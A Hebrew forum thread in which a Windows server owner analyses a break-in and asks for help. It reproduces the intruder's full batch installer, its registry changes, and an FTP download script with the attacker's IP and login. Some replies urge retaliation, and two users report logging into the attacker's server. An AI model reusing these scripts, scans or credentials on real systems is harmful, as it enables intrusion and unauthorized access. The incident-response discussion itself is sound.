יש לי מחשב שאני משתמש בו כשרת.
המחשב מריץ:
Windows 2000 Sp4
Serv-U
Apache
MySQL
uTorrent
VNC Server
ZoneAlarm w/ AV
המחשב נמצא ברשת, אבל בלי שיתופי כוננים.
גירסאות אחרונות של הכל, ועדכוני וינדוס אחרונים מותקנים.
ב"בדיקה שגרתית" שמתי לב שההגדרות של Serv-U שונו, ונוצרו בהם יוזרים חדשים (orbit, leech, upload) עם גישת אדמין לכל הכוננים וגישה לתיקיה "
[ c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" להעלאה והורדה.
לא מצאתי שום ראייה לשינוי של הקובץ, אז הרצתי חיפוש על כל הקבצים שנוצרו במחשב ב24 שעות האחרונות. מצאתי ארכיון בשם Kit.exe באחד הכוננים, שמכיל 23 קבצים שכנראה כולם קשורים, ובאחד באמת מצאתי את הגדרות השרת החדשות.
הנה רשימת הקבצים:

קוד:

 Volume in drive R is Server
 Volume Serial Number is 20DA-B1A0

 Directory of R:\programs\kit

05/20/2006  04:23a	  <DIR>		  .
05/20/2006  04:23a	  <DIR>		  ..
03/01/2004  06:16p			  10,240 caclsENG.exe
05/21/2005  01:44p				 157 dcg.acx
02/26/2006  10:29p				 571 diadv.msc
02/26/2006  10:29p			   2,390 diagw.msc
02/03/2006  01:20p			   9,405 fgh
02/03/2006  01:13p			 421,888 fgh.dll
05/21/2005  01:46p			 847,872 libeay32.dll
10/15/2005  03:52a			  40,960 mdts.exe
05/21/2005  01:45p				 722 pci.acx
01/31/2006  12:44p		   1,830,912 qttask.exe
05/21/2005  01:41p			   1,812 re.reg
05/21/2005  01:44p			  48,128 reg.exe
02/03/2006  01:46p			 140,183 settimedate.exe
05/21/2005  01:45p			 159,744 ssleay32.dll
10/15/2005  03:53a			  32,358 sv.exe
05/21/2005  01:46p				 973 svcon.crt
05/21/2005  01:46p				 963 svcon.key
10/15/2005  03:52a			  22,528 svrany.exe
06/10/2005  10:27a			  32,768 touch.exe
10/13/2005  02:46p				 428 wci.acx
03/14/2006  10:52a			   3,384 work.txt
08/04/2004  02:00p				  30 wre.cdm
06/10/2005  10:28a			  45,056 xcacls.exe
			  23 File(s)	  3,653,472 bytes
			   2 Dir(s)  24,685,027,328 bytes free

מה שלא מצאתי, זה איך הקובץ הוחדר.
אחד הקבצים המעניינים שראיתי שם זה work.txt שנראה כקובץ Batch שביצע את הכל. זה התוכן שלו:

קוד:

@echo off

:: create folders
xcacls.exe "c:\System Volume Information" /G EVERYONE:F /Y
mkdir "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup"

attrib.exe +h +s +r "c:\System Volume Information"
attrib.exe +h +s +r "c:\System Volume Information\catalog"
attrib.exe +h +s +r "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}"
attrib.exe +h +s +r "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup"

echo y|caclsENG "c:\System Volume Information" /T /G system:f Administrators:R
echo y|caclsENG "c:\System Volume Information\catalog" /T /G system:f
echo y|caclsENG "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" /T /G system:f
echo y|caclsENG "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" /T /G system:f

::change the time of the folder to make it the same as c:\RECYCLER
touch.exe -g "c:\RECYCLER" "c:\System Volume Information"
touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog"
touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}"
touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup"

::lock the folders (NOTE: working folder needs to be two deep from DENY folder) 
xcacls.exe "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" /G EVERYONE:F /Y
xcacls.exe "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" /G SYSTEM:F /Y
xcacls.exe "c:\System Volume Information\catalog" /D EVERYONE /Y
xcacls.exe "c:\System Volume Information" /G SYSTEM:F /Y

cd\
c:
cd %systemroot%
cd system32
qttask.exe /i
net start LdmSvc
net start LdmSvc
net start LdmSvc
net start LdmSvc
net start LdmSvc
regedit /s re.reg
settimedate pci.acx
settimedate diagw.msc
settimedate wci.acx
settimedate fgh.dll
settimedate qttask.exe
settimedate fgh
settimedate lyae.cmm
settimedate wre.cdm

:securen
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServe  r\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServe  r\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f
settimedate dqr.icm
settimedate svcon.crt
settimedate svcon.key
settimedate dcg.acx
settimedate libeay32.dll
settimedate ssleay32.dll
del reg.exe
del wget.exe
del re.reg
del xcacls.exe
del touch.exe
del caclsENG.exe
attrib +s +r +h pci.acx
attrib +s +r +h wci.acx
attrib +s +r +h fgh
attrib +s +r +h qttask.exe
attrib +s +r +h fgh.dll
attrib +s +r +h svcon.crt
attrib +s +r +h svcon.key
attrib +s +r +h libeay32.dll
attrib +s +r +h ssleay32.dll
attrib +s +r +h wre.cdm
attrib +s +h diagw.msc
:installed
del diadv.msc
del bla.txt
del work.bat
copy mdts.exe %systemroot%
copy sv.exe %systemroot%
copy svrany.exe %systemroot%
copy settimedate.exe %systemroot%
cd\
cd %systemroot%
sv.exe CREATESVRANY "LogDisc" "Logical Disk Client " "%systemroot%\svrany.exe" "%systemroot%\mdts.exe" 
net start LogDisc
net start LogDisc
net start LogDisc
del sv.exe
settimedate.exe svrany.exe
settimedate.exe mdts.exe
attrib +s +r +h svrany.exe
attrib +s +r +h mdts.exe
del settimedate.exe
cd system32
del mdts.exe
del svrany.exe
del sv.exe
del settimedate.exe

מה שגם שמתי לב שהאייקון של ServU מהבהב כל הזמן כאילו יש בו פעילות, אבל לא נראה שום משתמש בו.
לאחר שגיליתי על כל זה שיניתי את האייפי של המחשב ובינתיים נראה שאין בו פעילות (והאייקון גם הפסיק להבהב). לפני שאני מחזיר את המחשב לאייפי המקורי, איך אני יכול להפוך את כל השינויים שהפורץ ביצע? (לפי work.txt), איך אני יכול לגלות איך כל זה קרה, ואיך למנוע מזה לקרות בעתיד?
תודה

כן , ה"קיט" שלהם כביכול עושה את כל הפעילויות
ודרך הקובץ word.txt ההוא שראיתי אפשר גם לעשות פעילויות כמו להתחבר לאפטיפי מסוים להוריד קבצים לבצע פקודות במחשב וכ'ו וכ'ו
מה שאני מציע לך זה ככה
קודם כל לסגור את הסרביו גם את התוכנה , גם את התוכנה וגם את כל הפרוססים שקשורים לזה .
אחרי זה להתחיל לראות מה המצב תסגור את כל הדברים שקשורים לאינטרנט אצלך כמו דפדפן תוכנה הטורנטים שלך וכ'ו . ותבצע בדיקה netstat -an לאחר מכן תבדוק אם אנשים מחוברים למחשב שלך בפורטים מוזרים שכאלה .
אם ההבעייה חוזרת לא יודע אם תוכל עם התוכנות הרגילות להסיר את זה , פירמוט ואבטחת המחשב מחדש יועילו מאוד.
בהצלחה.
נ.ב היוזר עם המספרים המוזרים יוצר מעין תקייה שנראת לך שונה ומעבירה אותך לאותה תקייה
לדוגמא control panel ואתה תראה את זה כך ושתכנס לבדוק זה גם יכנס לשם , אבל בעצם זאת תקייה אחרת .

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

טוב, ניסיתי להפוך את השינויים שבוצעו אבל חלק אני לא יודע איך..לדוגמא, זה מה שהקובץ רג'יסטרי ביצע:

קוד:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\lanmanserver]
"DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00,  00,00
"DependOnGroup"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\lanmanworkstation]
"DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00,  00,00
"DependOnGroup"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\Eventlog]
"DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00,  00,00
"DependOnGroup"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\PlugPlay]
"DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00,  00,00
"DependOnGroup"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\RpcSs]
"DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00,  00,00
"DependOnGroup"=hex(7):00,00

איך אני יכול לדעת מה היה שם קודם, ולהחזיר את זה?

מתברר שהם לא היו יסודיים, מצאתי את הקובץ bla.txt למרות שבwork.txt הם היו אמורים למחוק אותו..קיצר הקובץ הזה ככל הנראה התחבר לשרת שלהם והוריד הכל:

קוד:

open 192.84.149.100 5004
leech
wizdom
binary
get svcon.crt
get svcon.key
get dcg.acx
get diagw.msc
get fgh
get fgh.dll
get work.txt
get libeay32.dll
get wre.cdm
get pci.acx
get qttask.exe
get re.reg
get reg.exe
get settimedate.exe
get caclsENG.exe
get ssleay32.dll
get wci.acx
get touch.exe
get xcacls.exe
get sv.exe
get mdts.exe
get svrany.exe
quit

יפה שהכל בוצע תחת עיני הפיירוול ולא ממש הזיז לו...

כמו שאמרתי או שתחזיר להם מלחמה יש לך את ההוספט+ פורט + יוזר וסיסמא

חבל שהשרת לא על ספקית ישראלית גם אביוז קטן היה נחמד פה
יוםטוב.

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

עדכון הצלחתי להתחבר לשרת הפורץ אין לך גישת הראצה אז לדפוק אותם לא ממש יעזור לך
מה שאני מציע לך זה לתת אביוז + לבדוק ששום דבר מהקבצים האלו לא רץ לך על המחשב
תמונה מהשרת :

http://img164.imageshack.us/my.php?image=19qg1.jpg

http://img148.imageshack.us/my.php?image=22rv.jpg

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

גם אני התחברתי לשרת, אבל..לפני ה"השבת מלחמה", על כל הקבצים שיש שם כבר הרצתי חיפוש ומחקתי את התוצאות, אבל איך אני הופך את השינויי רג'יסטרי ודואג למנוע מקרים כאלה בעתיד?
ד"א, ב SysVol מצאתי גם קבצים Dfind.exe, pskill.exe וגם קובץ dfind בלי סיומת שמכיל הרבה כתובות אייפים בטווחים שונים עם פקודות.

ועוד משהו, את הקובץ bla.txt שמכיל את הפקודות להורדת כל הקבצים, מצאתי בdoc&settings\myuser, ביחד עם עוד כמה קבצים..

אני לא יודע איזה נזקים הם כבר עשות
Dfind זה סורק שהם סורקים דרכך מחשבים אחרים בדרך לפריצה . מה לא היה מאובטח אצלך ואיך הם נכנסו קשה לדעת . אולי תספר לנו מה רץ לך על המחשב במודע.

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

על המחשב רץ כל מה שרשמתי בהודעה המקורית, ובנוסף שכחתי להזכיר שרת MySQL.
אין איזה כלי שאני יכול לחפש לבדוק לExploits?
חוץ מזה, אני עדיין רוצה לנסות לשחזר את ההגדרות רג'יסטרי שהם שינו...

PHpmyadmin ?
כנראה שלא הבטחת אותו :<

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

ציטוט:

במקור נכתב על ידי elitea PHpmyadmin ? כנראה שלא הבטחת אותו :<

כן גם הוא פועל, מה אפשר לאבטח בו? רק התקנתי אותו והגדרתי סיסמא.

אם הגדרת סיסמא לרוט אז הוא מאובטח :X פשוט אם אין סיסמא לממשק

קוד:

http://ip/phpmyadmin

נכנסים לממשק ו"חוגגים".

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

הגדרתי, ברור שהגדרתי.
הוא גם ממוקם בתיקיה עם htaccess

ב- Dfind תחפש את הפורט שהוא חיפש עליו בפקודה שמופיעה למעלה צריכה להיות משו כזה:
dfind.exe -p portnumber XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX כמובן שהportnumber הוא הפורט שעליו הוא חיפש את נקודות התורפה.

אחרי זה תריץ חיפוש משכיל לגבי הפורט. כלומר, תחפש בגוגל את מספר הפורט ותכתוב exploit או משו בסגנון תבין איפה הייתה החולייה החלשה ותעדכן אותה.

הזון אלארם לא התריע כי כנראה הפורט היה מאושר על ידי אחת התוכנות שלך.
משום מה אני חושב שזה הmysql בכל מקרה, זה נראה כמו ילדוני סקריפט ככה שתמיד עדיף לעדכן את כל התכונות שרת שלך לגרסאות הכי מעודכנות. לפי איך שזה כתוב זה נראה שהם לא השתמשו במשו שעדיין לא דווח...

אני חייב להגיד שילדוני הסקריפט נהים מתחוכמים.

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.mozilla.org/products/firefox/buttons/firefox_pixel.png]

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.axler.org/~jt/tmp/get-winamp.png]

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.axler.org/~jt/tmp/get_iriver3.png]

אכן משתפרים בממזרות
לפחות רק בזה.

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

הממ זה הקובץ Dfind:
http://www.liorchen.com/hack/DFind.txt
נראה שהכל זה פורט 5900, שכזכור לי הוא הפורט של VNC, שאני משתמש בה לגישה מרחוק :S
טוב אני משנה את הVNC שלי לפורט אחר...לא דיפולט.

כן זאת סריקה של VNC .
ד"א זה שהם סרקו VNC על המחשב שלך , לא אומר שדרך שם הם נכנסו . בכל מקרה לשנות פורט לשים סיסמא ומשתמש זה תמיד טוב
.

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

אבל דרכו הם מצאו את המחשב, לא? אז לשנות פורט כבר טוב.
השאלה באמת איך נכנסו והחדירו את הקבצים..

אם הם חבורה של סורקי Vnc אז סביר להניח שגם אותך מצאו ככה במידה והיה לך על המחשב והכל היה פתוח . אבל בלי קשר הם יכולים לנצל את המחשב שלך לסרוק כל דבר שבא להם ולהשתמש בתוצאות .

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]

תבדוק שיש לך את הגרסא האחרונה של VNC! ושתהיה לך ססמא קשה ואם אתה רוצה תשנה את הפורט אבל הדגש הוא על הגרסא האחרונה של VNC

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.mozilla.org/products/firefox/buttons/firefox_pixel.png]

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.axler.org/~jt/tmp/get-winamp.png]

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://www.axler.org/~jt/tmp/get_iriver3.png]

אהממ נראה שמחקתי יותר מידי קבצים/רג'יסטרי עכשיו אחרי ריסטרט Local Area Connection נעלם וגם Device Manager מציג רשימה ריקה (שלוחצים עליו הוא פותח חלון לבן ריק) מה מחקתי מהרשימת שינויים בת'רד הזה שאחראי עליהם?

ציטוט:

במקור נכתב על ידי ליאור אונליין אהממ נראה שמחקתי יותר מידי קבצים/רג'יסטרי עכשיו אחרי ריסטרט Local Area Connection נעלם וגם Device Manager מציג רשימה ריקה (שלוחצים עליו הוא פותח חלון לבן ריק) מה מחקתי מהרשימת שינויים בת'רד הזה שאחראי עליהם?

אוקי הצלחתי להחזיר אותם. ככל הנראה הוגדרה לשירות PlugPlay תלות בשירות שהפורץ יצר, שירות שמחקתי, ולכן PlugPlay לא עלה. הסרתי את התלות וזה נראה בסדר.

אחרי ההתקנה מחדש, אל תניח שלא יפרצו אליו שוב, כי גם זה יקרה...

בהצלחה

נמאס לכם לזכור סיסמאות? לחצו כאן!

הבעיה שהשרת לא פיזית לידי אז זה ייקח זמן עד שזה יתאפשר. בכ"א, אחרי התקנה מחדש, מה עוד אפשר לעשות למנוע מקרים כאלה, בשרת ווינדוס?

נמאס לכם לזכור סיסמאות? לחצו כאן!

נמאס לכם לזכור סיסמאות? לחצו כאן!

הועבר לפורום רשתות ואבטחת מידע.
בהצלחה!

לדעתי זה דווקא שייך לפורום של מייקרוסופט - כי תוכנת השרת שנפרץ הוא שלה, וסיבת הפריצה
היא לא ברשת, למרות שבמייקרוסופט מעדיפים להאמין שכך הדבר.

מה אתה יכול לעשות? תן לי לחשוב שניה.... אתה יכול לעבור למערכת הפעלה בטוחה יותר!
כגון GNU/LINUX, OPENBSD או SOLARIS.

ממילה כמעט כל הדברים שאתה מריץ אם לא כולם הם מוצרי קוד פתוח שזמינים לGNU/LINUX
וגם עובדים טוב יותר תחתיו, חוץ משרת FTP - אני ממליץ על VSFTPD.

MYSQL - יש גירסה כמעט לכל מערכת הפעלה אפשרית.
PHP - עובד הרבה יותר טוב תחת מערכות *NIX
PHPMYADMIN - כנ"ל
APACHE - כנ"ל
IPTABLES של GNU/LINUX הוא בין הפיירוולים הטובים בשוק אם לא הטוב ביותר.

וכו'.

או שאתה יכול להמשיך לנסות למצוא איך חדרו אליך לשרת דרך באגים שמייקרוסופט
עדיין לא תקנה ולא בטוח שגם תתקן - אחרי הכל יש כבר גירסה 2003 לשרת אז למה
להרוס את המכירות???